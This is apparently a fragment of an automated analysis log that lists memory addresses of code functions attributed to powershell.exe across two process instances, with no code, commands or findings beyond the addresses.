Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB404E5B	25_2_00007FF9BB404E5B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40DE90	25_2_00007FF9BB40DE90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40552D	25_2_00007FF9BB40552D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40A54D	25_2_00007FF9BB40A54D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB4074FD	25_2_00007FF9BB4074FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40C4FD	25_2_00007FF9BB40C4FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40CD00	25_2_00007FF9BB40CD00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB402DA6	25_2_00007FF9BB402DA6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB4045BD	25_2_00007FF9BB4045BD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40B58D	25_2_00007FF9BB40B58D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB40657B	25_2_00007FF9BB40657B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB5754CD	25_2_00007FF9BB5754CD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BBA11E4E	25_2_00007FF9BBA11E4E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BBB8955A	25_2_00007FF9BBB8955A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BBB81BEA	25_2_00007FF9BBB81BEA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BBB801C8	25_2_00007FF9BBB801C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BBB89563	25_2_00007FF9BBB89563
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BBB8656F	25_2_00007FF9BBB8656F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB3F9831	25_2_00007FF9BB3F9831
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BAF41218	26_2_00007FF9BAF41218
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BAF4324A	26_2_00007FF9BAF4324A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BAF4D278	26_2_00007FF9BAF4D278
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BAF627E0	26_2_00007FF9BAF627E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BAF40FE0	26_2_00007FF9BAF40FE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BAF66018	26_2_00007FF9BAF66018
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BAF41F18	26_2_00007FF9BAF41F18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BAF4EF50	26_2_00007FF9BAF4EF50
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BAF46638	26_2_00007FF9BAF46638
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BAF456AA	26_2_00007FF9BAF456AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BAF48BAD	26_2_00007FF9BAF48BAD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BAF58292	26_2_00007FF9BAF58292
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BAF41905	26_2_00007FF9BAF41905
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BAF41030	26_2_00007FF9BAF41030
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BAF418D6	26_2_00007FF9BAF418D6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BAF41F70	26_2_00007FF9BAF41F70
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BAF58688	26_2_00007FF9BAF58688
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB1A41C1	26_2_00007FF9BB1A41C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB1A47C8	26_2_00007FF9BB1A47C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB35561D	26_2_00007FF9BB35561D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CDC1A	26_2_00007FF9BB3CDC1A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E642D	26_2_00007FF9BB3E642D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F042D	26_2_00007FF9BB3F042D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D63FF	26_2_00007FF9BB3D63FF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E7BFA	26_2_00007FF9BB3E7BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D540C	26_2_00007FF9BB3D540C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D44A5	26_2_00007FF9BB3D44A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CBC9E	26_2_00007FF9BB3CBC9E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EFC9D	26_2_00007FF9BB3EFC9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C8CA9	26_2_00007FF9BB3C8CA9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CECD3	26_2_00007FF9BB3CECD3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DD472	26_2_00007FF9BB3DD472
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E5487	26_2_00007FF9BB3E5487
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C7487	26_2_00007FF9BB3C7487
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C1C7B	26_2_00007FF9BB3C1C7B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C5B28	26_2_00007FF9BB3C5B28
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C4B1B	26_2_00007FF9BB3C4B1B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F2B1D	26_2_00007FF9BB3F2B1D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C631E	26_2_00007FF9BB3C631E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F4B41	26_2_00007FF9BB3F4B41
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D734E	26_2_00007FF9BB3D734E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F32DD	26_2_00007FF9BB3F32DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E7ADB	26_2_00007FF9BB3E7ADB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CD2F6	26_2_00007FF9BB3CD2F6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E12F0	26_2_00007FF9BB3E12F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E5B02	26_2_00007FF9BB3E5B02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DDAFA	26_2_00007FF9BB3DDAFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F239D	26_2_00007FF9BB3F239D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EDBC1	26_2_00007FF9BB3EDBC1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D5BD5	26_2_00007FF9BB3D5BD5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D8361	26_2_00007FF9BB3D8361
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DCB75	26_2_00007FF9BB3DCB75
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CAB69	26_2_00007FF9BB3CAB69
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E536B	26_2_00007FF9BB3E536B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C8384	26_2_00007FF9BB3C8384
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EAB7D	26_2_00007FF9BB3EAB7D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E6B95	26_2_00007FF9BB3E6B95
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C1227	26_2_00007FF9BB3C1227
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EFA1D	26_2_00007FF9BB3EFA1D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F021D	26_2_00007FF9BB3F021D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F09DD	26_2_00007FF9BB3F09DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F11DD	26_2_00007FF9BB3F11DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C41D9	26_2_00007FF9BB3C41D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CA1EC	26_2_00007FF9BB3CA1EC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CDA06	26_2_00007FF9BB3CDA06
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D5217	26_2_00007FF9BB3D5217
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DE2A5	26_2_00007FF9BB3DE2A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EE2A8	26_2_00007FF9BB3EE2A8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CF2A3	26_2_00007FF9BB3CF2A3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EEA9D	26_2_00007FF9BB3EEA9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EF29D	26_2_00007FF9BB3EF29D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F1A9D	26_2_00007FF9BB3F1A9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DB2D5	26_2_00007FF9BB3DB2D5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C7AD6	26_2_00007FF9BB3C7AD6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C2A61	26_2_00007FF9BB3C2A61
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CCA63	26_2_00007FF9BB3CCA63
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E726D	26_2_00007FF9BB3E726D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D326C	26_2_00007FF9BB3D326C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C9A85	26_2_00007FF9BB3C9A85
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C8A93	26_2_00007FF9BB3C8A93
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CBA8E	26_2_00007FF9BB3CBA8E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CEA8F	26_2_00007FF9BB3CEA8F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CE92D	26_2_00007FF9BB3CE92D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D8942	26_2_00007FF9BB3D8942
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E493B	26_2_00007FF9BB3E493B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C7958	26_2_00007FF9BB3C7958
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F38DD	26_2_00007FF9BB3F38DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CD0E0	26_2_00007FF9BB3CD0E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D18E0	26_2_00007FF9BB3D18E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C48EB	26_2_00007FF9BB3C48EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E50ED	26_2_00007FF9BB3E50ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E58EB	26_2_00007FF9BB3E58EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D59C1	26_2_00007FF9BB3D59C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CB1BC	26_2_00007FF9BB3CB1BC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C71D5	26_2_00007FF9BB3C71D5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E61CD	26_2_00007FF9BB3E61CD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EC9C9	26_2_00007FF9BB3EC9C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C815A	26_2_00007FF9BB3C815A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CA973	26_2_00007FF9BB3CA973
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DD17B	26_2_00007FF9BB3DD17B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F481F	26_2_00007FF9BB3F481F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DC832	26_2_00007FF9BB3DC832
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CC834	26_2_00007FF9BB3CC834
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D402C	26_2_00007FF9BB3D402C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F17DD	26_2_00007FF9BB3F17DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F2FDD	26_2_00007FF9BB3F2FDD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C8FF6	26_2_00007FF9BB3C8FF6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E5FEA	26_2_00007FF9BB3E5FEA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C9807	26_2_00007FF9BB3C9807
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E480B	26_2_00007FF9BB3E480B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F209D	26_2_00007FF9BB3F209D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F289D	26_2_00007FF9BB3F289D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DD8C4	26_2_00007FF9BB3DD8C4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D28BB	26_2_00007FF9BB3D28BB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D08CD	26_2_00007FF9BB3D08CD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D48CC	26_2_00007FF9BB3D48CC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CB864	26_2_00007FF9BB3CB864
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E7869	26_2_00007FF9BB3E7869
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C887E	26_2_00007FF9BB3C887E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E907B	26_2_00007FF9BB3E907B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C587E	26_2_00007FF9BB3C587E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CE093	26_2_00007FF9BB3CE093
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CEF1D	26_2_00007FF9BB3CEF1D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D3736	26_2_00007FF9BB3D3736
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EE72D	26_2_00007FF9BB3EE72D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EEF2D	26_2_00007FF9BB3EEF2D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D6730	26_2_00007FF9BB3D6730
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DE745	26_2_00007FF9BB3DE745
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3ED6ED	26_2_00007FF9BB3ED6ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C5EFB	26_2_00007FF9BB3C5EFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D6F14	26_2_00007FF9BB3D6F14
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C7F10	26_2_00007FF9BB3C7F10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D4F9F	26_2_00007FF9BB3D4F9F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E6F99	26_2_00007FF9BB3E6F99
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C17B6	26_2_00007FF9BB3C17B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C6FC1	26_2_00007FF9BB3C6FC1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C67CA	26_2_00007FF9BB3C67CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CA75E	26_2_00007FF9BB3CA75E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DDF60	26_2_00007FF9BB3DDF60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EF75D	26_2_00007FF9BB3EF75D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EFF5D	26_2_00007FF9BB3EFF5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F0F5D	26_2_00007FF9BB3F0F5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DCF5F	26_2_00007FF9BB3DCF5F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E8F5B	26_2_00007FF9BB3E8F5B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DA771	26_2_00007FF9BB3DA771
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CBF6D	26_2_00007FF9BB3CBF6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EDF88	26_2_00007FF9BB3EDF88
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CF784	26_2_00007FF9BB3CF784
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C4F94	26_2_00007FF9BB3C4F94
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F361D	26_2_00007FF9BB3F361D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E6E19	26_2_00007FF9BB3E6E19
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D561C	26_2_00007FF9BB3D561C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E5E1B	26_2_00007FF9BB3E5E1B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F062D	26_2_00007FF9BB3F062D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F4E3D	26_2_00007FF9BB3F4E3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C3654	26_2_00007FF9BB3C3654
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E0E4C	26_2_00007FF9BB3E0E4C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CE5E1	26_2_00007FF9BB3CE5E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EBDF5	26_2_00007FF9BB3EBDF5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D3DFC	26_2_00007FF9BB3D3DFC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D1EA0	26_2_00007FF9BB3D1EA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E66AB	26_2_00007FF9BB3E66AB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CDE63	26_2_00007FF9BB3CDE63
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F265D	26_2_00007FF9BB3F265D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F4675	26_2_00007FF9BB3F4675
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DD674	26_2_00007FF9BB3DD674
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CAE86	26_2_00007FF9BB3CAE86
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CD696	26_2_00007FF9BB3CD696
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C1E97	26_2_00007FF9BB3C1E97
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E4E8D	26_2_00007FF9BB3E4E8D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DA527	26_2_00007FF9BB3DA527
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EF51D	26_2_00007FF9BB3EF51D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CA537	26_2_00007FF9BB3CA537
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DDD2A	26_2_00007FF9BB3DDD2A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DE529	26_2_00007FF9BB3DE529
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CF53B	26_2_00007FF9BB3CF53B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D9557	26_2_00007FF9BB3D9557
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D9CDE	26_2_00007FF9BB3D9CDE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F0CDD	26_2_00007FF9BB3F0CDD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F14DD	26_2_00007FF9BB3F14DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3E84FD	26_2_00007FF9BB3E84FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C5512	26_2_00007FF9BB3C5512
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C3D11	26_2_00007FF9BB3C3D11
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3DBDA1	26_2_00007FF9BB3DBDA1
